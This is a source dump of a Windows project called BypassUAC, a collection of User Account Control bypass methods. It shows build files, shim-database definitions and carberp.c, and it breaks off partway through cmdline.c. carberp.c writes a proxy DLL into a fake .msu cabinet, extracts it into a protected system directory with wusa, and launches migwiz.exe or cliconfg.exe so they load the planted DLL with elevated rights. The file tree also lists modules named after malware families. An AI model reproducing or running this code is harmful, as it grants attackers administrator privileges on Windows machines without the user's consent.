├── .gitattributes
├── .gitignore
├── BypassUAC.sln
├── BypassUAC
├── BypassUAC.vcxproj
├── BypassUAC.vcxproj.filters
├── apphelp.h
├── carberp.c
├── carberp.h
├── cmdline.c
├── cmdline.h
├── compress.c
├── compress.h
├── consts.h
├── fubuki32.h
├── fubuki32comp.h
├── fubuki64.h
├── fubuki64comp.h
├── global.h
├── gootkit.c
├── gootkit.h
├── hibiki32.h
├── hibiki32comp.h
├── hibiki64.h
├── hibiki64comp.h
├── hybrids.c
├── hybrids.h
├── inazuma32.h
├── inject.c
├── inject.h
├── kongou32.h
├── kongou32comp.h
├── kongou64.h
├── kongou64comp.h
├── main.c
├── makecab.c
├── makecab.h
├── pitou.c
├── pitou.h
├── simda.c
├── simda.h
├── sup.c
└── sup.h
├── README.md
└── Shared
├── _strcat.c
├── _strcmp.c
├── _strcmpi.c
├── _strcpy.c
├── _strend.c
├── _strlen.c
├── _strncmp.c
├── _strncmpi.c
├── _strncpy.c
├── minirtl.h
├── ntos.h
├── rtltypes.h
├── strtoul.c
└── ultostr.c
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
10 | # This is needed for earlier builds of msysgit that do not have it on by
11 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.sln.docstates
8 |
9 | # Build results
10 | [Dd]ebug/
11 | [Dd]ebugPublic/
12 | [Rr]elease/
13 | x64/
14 | build/
15 | bld/
16 | [Bb]in/
17 | [Oo]bj/
18 |
19 | # Roslyn cache directories
20 | *.ide/
21 |
22 | # MSTest test Results
23 | [Tt]est[Rr]esult*/
24 | [Bb]uild[Ll]og.*
25 |
26 | #NUNIT
27 | *.VisualState.xml
28 | TestResult.xml
29 |
30 | # Build Results of an ATL Project
31 | [Dd]ebugPS/
32 | [Rr]eleasePS/
33 | dlldata.c
34 |
35 | *_i.c
36 | *_p.c
37 | *_i.h
38 | *.ilk
39 | *.meta
40 | *.obj
41 | *.pch
42 | *.pdb
43 | *.pgc
44 | *.pgd
45 | *.rsp
46 | *.sbr
47 | *.tlb
48 | *.tli
49 | *.tlh
50 | *.tmp
51 | *.tmp_proj
52 | *.log
53 | *.vspscc
54 | *.vssscc
55 | .builds
56 | *.pidb
57 | *.svclog
58 | *.scc
59 |
60 | # Chutzpah Test files
61 | _Chutzpah*
62 |
63 | # Visual C++ cache files
64 | ipch/
65 | *.aps
66 | *.ncb
67 | *.opensdf
68 | *.sdf
69 | *.cachefile
70 |
71 | # Visual Studio profiler
72 | *.psess
73 | *.vsp
74 | *.vspx
75 |
76 | # TFS 2012 Local Workspace
77 | $tf/
78 |
79 | # Guidance Automation Toolkit
80 | *.gpState
81 |
82 | # ReSharper is a .NET coding add-in
83 | _ReSharper*/
84 | *.[Rr]e[Ss]harper
85 | *.DotSettings.user
86 |
87 | # JustCode is a .NET coding add-in
88 | .JustCode
89 |
90 | # TeamCity is a build add-in
91 | _TeamCity*
92 |
93 | # DotCover is a Code Coverage Tool
94 | *.dotCover
95 |
96 | # NCrunch
97 | _NCrunch_*
98 | .*crunch*.local.xml
99 |
100 | # MightyMoose
101 | *.mm.*
102 | AutoTest.Net/
103 |
104 | # Web workbench (sass)
105 | .sass-cache/
106 |
107 | # Installshield output folder
108 | [Ee]xpress/
109 |
110 | # DocProject is a documentation generator add-in
111 | DocProject/buildhelp/
112 | DocProject/Help/*.HxT
113 | DocProject/Help/*.HxC
114 | DocProject/Help/*.hhc
115 | DocProject/Help/*.hhk
116 | DocProject/Help/*.hhp
117 | DocProject/Help/Html2
118 | DocProject/Help/html
119 |
120 | # Click-Once directory
121 | publish/
122 |
123 | # Publish Web Output
124 | *.[Pp]ublish.xml
125 | *.azurePubxml
126 | ## TODO: Comment the next line if you want to check in your
127 | ## web deploy settings, but note that it will include unencrypted
128 | ## passwords
129 | #*.pubxml
130 |
131 | # NuGet Packages Directory
132 | packages/*
133 | ## TODO: If the tool you use requires repositories.config
134 | ## uncomment the next line
135 | #!packages/repositories.config
136 |
137 | # Enable "build/" folder in the NuGet Packages folder since
138 | # NuGet packages use it for MSBuild targets.
139 | # This line needs to be after the ignore of the build folder
140 | # (and the packages folder if the line above has been uncommented)
141 | !packages/build/
142 |
143 | # Windows Azure Build Output
144 | csx/
145 | *.build.csdef
146 |
147 | # Windows Store app package directory
148 | AppPackages/
149 |
150 | # Others
151 | sql/
152 | *.Cache
153 | ClientBin/
154 | [Ss]tyle[Cc]op.*
155 | ~$*
156 | *~
157 | *.dbmdl
158 | *.dbproj.schemaview
159 | *.pfx
160 | *.publishsettings
161 | node_modules/
162 |
163 | # RIA/Silverlight projects
164 | Generated_Code/
165 |
166 | # Backup & report files from converting an old project file
167 | # to a newer Visual Studio version. Backup files are not needed,
168 | # because we have git ;-)
169 | _UpgradeReport_Files/
170 | Backup*/
171 | UpgradeLog*.XML
172 | UpgradeLog*.htm
173 |
174 | # SQL Server files
175 | *.mdf
176 | *.ldf
177 |
178 | # Business Intelligence projects
179 | *.rdl.data
180 | *.bim.layout
181 | *.bim_*.settings
182 |
183 | # Microsoft Fakes
184 | FakesAssemblies/
185 |
186 | # LightSwitch generated files
187 | GeneratedArtifacts/
188 | _Pvt_Extensions/
189 | ModelManifest.xml
--------------------------------------------------------------------------------
/BypassUAC.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2013
4 | VisualStudioVersion = 12.0.40629.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BypassUAC", "BypassUAC\BypassUAC.vcxproj", "{78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|Win32.Build.0 = Debug|Win32
18 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|x64.ActiveCfg = Debug|x64
19 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Debug|x64.Build.0 = Debug|x64
20 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|Win32.ActiveCfg = Release|Win32
21 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|Win32.Build.0 = Release|Win32
22 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|x64.ActiveCfg = Release|x64
23 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/BypassUAC/BypassUAC.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {78CD3A1C-1C8F-488C-ABA6-08AAFD362F0A}
23 | Win32Proj
24 | BypassUAC
25 |
26 |
27 |
28 | Application
29 | true
30 | v120
31 | Unicode
32 |
33 |
34 | Application
35 | false
36 | v120
37 | true
38 | Unicode
39 |
40 |
41 | v120
42 |
43 |
44 | v120
45 | Unicode
46 | true
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 | true
60 |
61 |
62 | false
63 | ..\bin\$(Platform)\
64 | $(ProjectName)_x86
65 |
66 |
67 | false
68 | ..\bin\$(Platform)\
69 | $(ProjectName)_x64
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | Disabled
77 | WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 |
89 |
90 | MaxSpeed
91 | true
92 | true
93 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
94 | true
95 | None
96 | true
97 | Size
98 | MultiThreaded
99 | CompileAsC
100 |
101 |
102 | Windows
103 | false
104 | true
105 | true
106 | 6.0
107 | 6.0
108 | main
109 | true
110 |
111 |
112 |
113 |
114 | true
115 | Size
116 | true
117 | MultiThreaded
118 | true
119 | CompileAsC
120 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
121 |
122 |
123 | 6.0
124 | false
125 | Windows
126 | 6.0
127 | true
128 | true
129 | main
130 | true
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
--------------------------------------------------------------------------------
/BypassUAC/BypassUAC.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {a8fca0f2-f3d0-4a03-85ba-08c2ecacbff2}
18 |
19 |
20 | {81e84f63-ae69-465e-901c-d08d3b7e0f5e}
21 |
22 |
23 |
24 |
25 | minirtl
26 |
27 |
28 | minirtl
29 |
30 |
31 | minirtl
32 |
33 |
34 | minirtl
35 |
36 |
37 | minirtl
38 |
39 |
40 | minirtl
41 |
42 |
43 | minirtl
44 |
45 |
46 | minirtl
47 |
48 |
49 | minirtl
50 |
51 |
52 | minirtl
53 |
54 |
55 | minirtl
56 |
57 |
58 | Source Files
59 |
60 |
61 | Source Files
62 |
63 |
64 | Source Files
65 |
66 |
67 | Source Files
68 |
69 |
70 | Source Files
71 |
72 |
73 | Source Files
74 |
75 |
76 | Source Files
77 |
78 |
79 | Source Files
80 |
81 |
82 | Source Files
83 |
84 |
85 | Source Files
86 |
87 |
88 | Source Files
89 |
90 |
91 |
92 |
93 | Header Files\modules
94 |
95 |
96 | Header Files\modules
97 |
98 |
99 | Header Files\modules
100 |
101 |
102 | Header Files\modules
103 |
104 |
105 | Header Files\modules
106 |
107 |
108 | Header Files\modules
109 |
110 |
111 | Header Files\modules
112 |
113 |
114 | Header Files
115 |
116 |
117 | Header Files
118 |
119 |
120 | Header Files
121 |
122 |
123 | Header Files
124 |
125 |
126 | Header Files
127 |
128 |
129 | Header Files
130 |
131 |
132 | Header Files
133 |
134 |
135 | Header Files
136 |
137 |
138 | Header Files
139 |
140 |
141 | Header Files
142 |
143 |
144 | Header Files
145 |
146 |
147 | Header Files
148 |
149 |
150 | Header Files
151 |
152 |
153 | Header Files
154 |
155 |
156 | Header Files
157 |
158 |
159 |
--------------------------------------------------------------------------------
/BypassUAC/apphelp.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016, translated from Microsoft Documentation
4 | *
5 | * TITLE: APPHELP.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 12 Nov 2015
10 | *
11 | * Application Compatibility Helper routines and definitions.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
/*
 * Identifier types used by the Sdb* writer function-pointer types declared
 * at the bottom of this header. PDB is the opaque database handle returned
 * by pfnSdbCreateDatabase and passed to every other pfnSdb* call.
 */
typedef DWORD TAGID;
typedef DWORD TAGREF;
typedef DWORD TAG;      /* a TAG is (tag index | TAG_TYPE_* class), see below */
typedef DWORD INDEXID;
typedef PVOID PDB;
typedef HANDLE HSDB;

#define TAGID_ROOT 0
#define TAGID_NULL 0

/* Tag type classes: the high bits of a TAG select the payload kind. */
#define TAG_TYPE_NULL 0x1000
#define TAG_TYPE_BYTE 0x2000
#define TAG_TYPE_WORD 0x3000
#define TAG_TYPE_DWORD 0x4000
#define TAG_TYPE_QWORD 0x5000
#define TAG_TYPE_STRINGREF 0x6000
#define TAG_TYPE_LIST 0x7000
#define TAG_TYPE_STRING 0x8000
#define TAG_TYPE_BINARY 0x9000

/* DWORD-valued tags (written with pfnSdbWriteDWORDTag). */
#define TAG_PATCH_TAGID (0x5 | TAG_TYPE_DWORD)
#define TAG_OS_PLATFORM (0x23 | TAG_TYPE_DWORD)

/* Binary-valued tags (written with pfnSdbWriteBinaryTag). */
#define TAG_PATCH_BITS (0x2 | TAG_TYPE_BINARY)
#define TAG_EXE_ID (0x4 | TAG_TYPE_BINARY)
#define TAG_DATABASE_ID (0x7 | TAG_TYPE_BINARY)

/* List tags: opened with pfnSdbBeginWriteListTag, closed with pfnSdbEndWriteListTag. */
#define TAG_DATABASE (0x1 | TAG_TYPE_LIST)
#define TAG_LIBRARY (0x2 | TAG_TYPE_LIST)
#define TAG_PATCH (0x5 | TAG_TYPE_LIST)
#define TAG_EXE (0x7 | TAG_TYPE_LIST)
#define TAG_MATCHING_FILE (0x8 | TAG_TYPE_LIST)
#define TAG_SHIM_REF (0x9| TAG_TYPE_LIST)
#define TAG_PATCH_REF (0xA | TAG_TYPE_LIST)

/* String-reference tags (written with pfnSdbWriteStringTag). */
#define TAG_NAME (0x1 | TAG_TYPE_STRINGREF)
#define TAG_VENDOR (0x5 | TAG_TYPE_STRINGREF)
#define TAG_APP_NAME (0x6 | TAG_TYPE_STRINGREF)
#define TAG_COMMAND_LINE (0x8 | TAG_TYPE_STRINGREF)
#define TAG_COMPANY_NAME (0x9 | TAG_TYPE_STRINGREF)
#define TAG_INTERNAL_NAME (0x15 | TAG_TYPE_STRINGREF)

/* Path flavor accepted by pfnSdbCreateDatabase for pwszPath. */
typedef enum _PATH_TYPE {
    DOS_PATH,
    NT_PATH
} PATH_TYPE;

/* PATCHBITS.Opcode values (presumably; confirm against the apphelp documentation). */
#define PATCH_MATCH 0x4
#define PATCH_REPLACE 0x2
#define MAX_MODULE 32   /* capacity of PATCHBITS.ModuleName in WCHARs */

/*
 * Payload layout of a TAG_PATCH_BITS entry. Pattern is a trailing
 * variable-length array (declared [1] in the classic struct-hack style);
 * NOTE(review): its real length is presumably PatternSize bytes - confirm
 * at the point where the structure is built.
 */
typedef struct _PATCHBITS {
    DWORD Opcode;
    DWORD ActionSize;
    DWORD PatternSize;
    DWORD RVA;
    DWORD Reserved;
    WCHAR ModuleName[MAX_MODULE];
    BYTE Pattern[1];
} PATCHBITS, *PPATCHBITS;

/*
 * Function-pointer types for the shim database writer API. Nothing in this
 * header resolves them; the using code is expected to obtain the addresses
 * itself (NOTE(review): presumably from apphelp.dll - confirm at the call site).
 */

/* Creates a new database at pwszPath; returns NULL-like PDB on failure (caller checks). */
typedef PDB(WINAPI *pfnSdbCreateDatabase)(
    _In_ LPCWSTR pwszPath,
    _In_ PATH_TYPE eType
    );

/* Finishes writing and closes a database created with pfnSdbCreateDatabase. */
typedef void(WINAPI *pfnSdbCloseDatabaseWrite)(
    _Inout_ PDB pdb
    );

/* Opens a TAG_TYPE_LIST tag; returns the TAGID to hand to pfnSdbEndWriteListTag. */
typedef TAGID(WINAPI *pfnSdbBeginWriteListTag)(
    _In_ PDB pdb,
    _In_ TAG tTag
    );

typedef BOOL(WINAPI *pfnSdbWriteStringTag)(
    _In_ PDB pdb,
    _In_ TAG tTag,
    _In_ LPCWSTR pwszData
    );

typedef BOOL(WINAPI *pfnSdbEndWriteListTag)(
    _Inout_ PDB pdb,
    _In_ TAGID tiList
    );

/* Writes dwSize bytes from pBuffer as a TAG_TYPE_BINARY tag. */
typedef BOOL(WINAPI *pfnSdbWriteBinaryTag)(
    _In_ PDB pdb,
    _In_ TAG tTag,
    _In_ PBYTE pBuffer,
    _In_ DWORD dwSize
    );

typedef BOOL(WINAPI *pfnSdbWriteDWORDTag)(
    _In_ PDB pdb,
    _In_ TAG tTag,
    _In_ DWORD dwData
    );

/* Index maintenance: declare an index, start/stop indexing, then commit. */
typedef BOOL(WINAPI *pfnSdbStartIndexing)(
    _In_ PDB pdb,
    _In_ INDEXID iiWhich
    );

typedef void (WINAPI *pfnSdbStopIndexing)(
    _In_ PDB pdb,
    _In_ INDEXID iiWhich
    );

typedef BOOL(WINAPI *pfnSdbCommitIndexes)(
    _Inout_ PDB pdb
    );

/* Declares an index over tWhich keyed by tKey; the new INDEXID is returned through piiIndex. */
typedef BOOL(WINAPI *pfnSdbDeclareIndex)(
    _In_ PDB pdb,
    _In_ TAG tWhich,
    _In_ TAG tKey,
    _In_ DWORD dwEntries,
    _In_ BOOL bUniqueKey,
    _Out_ INDEXID *piiIndex
    );
142 |
--------------------------------------------------------------------------------
/BypassUAC/carberp.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016
4 | *
5 | * TITLE: CARBERP.C
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Tweaked Carberp methods.
12 | * Original Carberp is exploiting mcx2prov.exe in ehome.
13 | *
14 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
15 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
16 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
17 | * PARTICULAR PURPOSE.
18 | *
19 | *******************************************************************************/
20 | #include "global.h"
21 | #include "makecab.h"
22 |
23 | /*
24 | * ucmWusaExtractPackage
25 | *
26 | * Purpose:
27 | *
28 | * Extract cab to protected directory using wusa.
29 | *
30 | */
/*
 * Parameters:
 *   lpCommandLine - used directly as the wsprintfW FORMAT string; it must
 *                   contain exactly one %s, which receives the expanded
 *                   T_MSUPACKAGE_NAME path. Callers pass the constant
 *                   METHOD_*_CMDLINE strings, never external input.
 *
 * Returns the result of supRunProcess, FALSE if the package path could not
 * be expanded.
 *
 * Observable artifacts: a cmd.exe child process with the formatted command
 * line, and the file at T_MSUPACKAGE_NAME, which is deleted before return.
 */
BOOL ucmWusaExtractPackage(
    LPWSTR lpCommandLine
    )
{
    BOOL bResult = FALSE, cond = FALSE;     /* cond stays FALSE: the do/while runs once, break = early exit */
    WCHAR szMsuFileName[MAX_PATH + 1];
    WCHAR szCmd[MAX_PATH * 4];              /* NOTE(review): wsprintfW takes no size; format must stay short */

    RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));

    do {

        /* MAX_PATH, not sizeof: leaves the final element as a guaranteed terminator */
        if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
            szMsuFileName, MAX_PATH) == 0)
        {
            break;
        }

        //extract msu data to target directory
        RtlSecureZeroMemory(szCmd, sizeof(szCmd));
        wsprintfW(szCmd, lpCommandLine, szMsuFileName);
        bResult = supRunProcess(L"cmd.exe", szCmd);
        if (bResult == FALSE) {
            break;
        }

    } while (cond);

    /* Remove the package file whenever its name was expanded, success or not. */
    if (szMsuFileName[0] != 0) {
        DeleteFileW(szMsuFileName);
    }
    return bResult;
}
64 |
65 | /*
66 | * ucmWusaMethod
67 | *
68 | * Purpose:
69 | *
70 | * Build and install fake msu package then run target application.
71 | *
72 | */
/*
 * Parameters:
 *   Method       - UacMethodCarberp1 or UacMethodCarberp2; selects which
 *                  METHOD_* constant triple (source dll, command line,
 *                  target application) is used. Any other value -> FALSE.
 *   ProxyDll     - image bytes handed to ucmCreateCabinetForSingleFile.
 *   ProxyDllSize - size of ProxyDll in bytes; 0 -> FALSE.
 *
 * Returns the result of launching the target process; FALSE when any of
 * the three steps (cabinet build, extraction, launch) fails.
 */
BOOL ucmWusaMethod(
    UACBYPASSMETHOD Method,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL bResult = FALSE, cond = FALSE;     /* single-pass do/while, break = early exit */
    LPWSTR lpSourceDll, lpCommandLine, lpTargetProcess;
    WCHAR szCmd[MAX_PATH * 4];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0)
        )
    {
        return FALSE;
    }

    /* Every case assigns all three pointers, so none is read uninitialised below. */
    switch (Method) {

        //use migwiz.exe as target
    case UacMethodCarberp1:
        lpSourceDll = METHOD_MIGWIZ_SOURCEDLL;
        lpCommandLine = METHOD_MIGWIZ_CMDLINE;
        lpTargetProcess = METHOD_MIGWIZ_TARGETAPP;
        break;

        //use cliconfg.exe as target
    case UacMethodCarberp2:
        lpSourceDll = METHOD_SQLSRV_SOURCEDLL;
        lpCommandLine = METHOD_SQLSRV_CMDLINE;
        lpTargetProcess = METHOD_SQLSRV_TARGETAPP;
        break;

    default:
        return FALSE;
    }

    do {

        //
        // Extract file to the protected directory
        // First, create cab with fake msu ext, second run fusion process.
        //
        if (!ucmCreateCabinetForSingleFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
            break;
        }

        if (!ucmWusaExtractPackage(lpCommandLine)) {
            break;
        }

        //run target process for dll hijacking
        RtlSecureZeroMemory(szCmd, sizeof(szCmd));
        /* Only MAX_PATH of the MAX_PATH*4 buffer is offered to the expansion. */
        if (ExpandEnvironmentStringsW(lpTargetProcess,
            szCmd, MAX_PATH) == 0)
        {
            break;
        }
        /* bResult reflects only whether the target process was started. */
        bResult = supRunProcess(szCmd, NULL);

    } while (cond);


    return bResult;
}
139 |
140 | /*
141 | * ucmCreateCabinetForSingleFile
142 | *
143 | * Purpose:
144 | *
145 | * Build cabinet for usage in methods where required 1 file.
146 | *
147 | */
/*
 * Parameters:
 *   lpSourceDll  - environment-string template of the path the dll is
 *                  written to (reassigned below to the base-name pointer).
 *   ProxyDll     - bytes written to that path with supWriteBufferToFile.
 *   ProxyDllSize - size of ProxyDll in bytes; 0 -> FALSE.
 *
 * Returns the result of cabAddFile, FALSE if any earlier step fails.
 *
 * On-disk artifacts: the dll at the expanded lpSourceDll path (this
 * function never deletes it, even on failure) and the cabinet at the
 * expanded T_MSUPACKAGE_NAME path.
 */
BOOL ucmCreateCabinetForSingleFile(
    LPWSTR lpSourceDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL cond = FALSE, bResult = FALSE;     /* single-pass do/while, break = early exit */
    CABDATA *Cabinet = NULL;
    WCHAR szDllFileName[MAX_PATH + 1];
    WCHAR szMsuFileName[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0)
        )
    {
        return FALSE;
    }

    do {

        //drop proxy dll
        RtlSecureZeroMemory(szDllFileName, sizeof(szDllFileName));
        if (ExpandEnvironmentStringsW(lpSourceDll,
            szDllFileName, MAX_PATH) == 0)
        {
            break;
        }
        if (!supWriteBufferToFile(szDllFileName, ProxyDll, ProxyDllSize)) {
            break;
        }

        //build cabinet
        RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
        if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
            szMsuFileName, MAX_PATH) == 0)
        {
            break;
        }
        Cabinet = cabCreate(szMsuFileName);
        if (Cabinet) {
            /* Parameter reused as a local: now points at the file name part of szDllFileName. */
            lpSourceDll = _filenameW(szDllFileName);
            //put file without compression
            bResult = cabAddFile(Cabinet, szDllFileName, lpSourceDll);
            cabClose(Cabinet);
        }
        else {
            break;
        }

    } while (cond);

    return bResult;
}
202 |
--------------------------------------------------------------------------------
/BypassUAC/carberp.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: CARBERP.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Prototypes and definitions for Carberp method.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
/*
 * Entry point: selects the METHOD_* constants for Method, builds the
 * cabinet, extracts it and launches the target process. FALSE for a NULL
 * ProxyDll, zero ProxyDllSize, an unknown Method or a failed step.
 */
BOOL ucmWusaMethod(
    UACBYPASSMETHOD Method,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    );

/*
 * Runs cmd.exe with lpCommandLine formatted (wsprintfW, one %s) with the
 * expanded T_MSUPACKAGE_NAME path; deletes that file afterwards.
 */
BOOL ucmWusaExtractPackage(
    LPWSTR lpCommandLine
    );

/*
 * Writes ProxyDll to the expanded lpSourceDll path and packs that single
 * file, uncompressed, into a cabinet at the expanded T_MSUPACKAGE_NAME path.
 */
BOOL ucmCreateCabinetForSingleFile(
    LPWSTR lpSourceDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    );
36 |
--------------------------------------------------------------------------------
/BypassUAC/cmdline.c:
--------------------------------------------------------------------------------
1 | #include
2 |
/*
 * GetCommandLineParamW
 *
 * Purpose:
 *
 * Extract the ParamIndex-th parameter of CmdLine. Parameters are separated
 * by spaces; a parameter that starts with '"' extends up to the next '"'
 * (a '"' also terminates an unquoted parameter).
 *
 * Buffer, when non-NULL and BufferSize > 0, always receives a NUL-terminated
 * copy holding at most BufferSize-1 characters. ParamLen, when non-NULL,
 * receives the untruncated length (0 when ParamIndex is past the end).
 *
 * Returns TRUE when the parameter length is below BufferSize, FALSE when it
 * was truncated or CmdLine is NULL (both outputs are cleared in that case).
 */
BOOL GetCommandLineParamW(
    IN LPCWSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPWSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
    )
{
    ULONG current = 0;
    ULONG length = 0;
    BOOL canStore = (Buffer != NULL);

    if (ParamLen != NULL) {
        *ParamLen = 0;
    }

    if (CmdLine == NULL) {
        if (canStore && (BufferSize > 0)) {
            *Buffer = 0;
        }
        return FALSE;
    }

    while (current <= ParamIndex) {
        WCHAR terminator = L' ';

        length = 0;

        /* Skip the separating spaces in front of the parameter. */
        for (; *CmdLine == L' '; CmdLine++) {
        }

        /* Command line exhausted before ParamIndex: report an empty parameter. */
        if (*CmdLine == 0) {
            break;
        }

        if (*CmdLine == L'"') {
            terminator = L'"';
            CmdLine++;
        }

        /* length counts every character; only the first BufferSize-1 are stored. */
        for (; (*CmdLine != 0) && (*CmdLine != L'"') && (*CmdLine != terminator); CmdLine++) {
            length++;
            if ((current == ParamIndex) && canStore && (length < BufferSize)) {
                *Buffer++ = *CmdLine;
            }
        }

        /* Step over the closing quote or the space that ended the parameter. */
        if (*CmdLine != 0) {
            CmdLine++;
        }

        current++;
    }
